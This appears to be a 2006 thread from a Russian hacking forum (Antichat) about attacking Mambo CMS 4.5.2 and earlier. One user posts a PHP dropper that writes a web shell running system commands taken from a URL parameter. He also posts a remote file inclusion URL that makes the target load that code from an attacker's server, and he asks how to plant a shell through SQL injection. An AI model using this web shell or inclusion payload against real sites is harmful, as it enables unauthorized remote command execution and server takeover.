ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Mambo <=4.5.2
   
 
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 07.01.2006, 17:32
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию
Цитата:
Сообщение от insidex  
НЕТ! шел заливается на левый сервак,там этот файл и создается,иначе никак!
Бля,все равно не пашет,Неужели под Мамбу нету никаких пробивных эксплойтов?!
Я еще понимаю если это лол скажет, но ты то должен понимать блин, хочешь видео посмотри http://video.antichat.net/file13.html и тогда до себя дойдет, как работает include
 

  #12  
Старый 07.01.2006, 18:15
insidex
Познающий
Регистрация: 13.10.2005
Сообщений: 41
Провел на форуме:
62530

Репутация: 1
По умолчанию
Так еще раз, файл с содержимым
PHP код:

<?php
$fp=fopen("suntzu.php","w");
fputs($fp,"<? echo 'Hi Master';error_reporting(0);ini_set('max_execution_time',0);
system($HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
заливается на левый сервак(на специальный адресс),а вот с помощью команды

PHP код:
http://[target]//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=левый_сервак 
код выполняется на серваке.
Вообщем хер сним,ибо у этотого экса значительные ограничения.

Еще раз,на мамбе последних версиях есть возможность проведения sql-i инъекций.Так вот как с их помощью чертов шелл зафигачить на сервер?
 
 
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ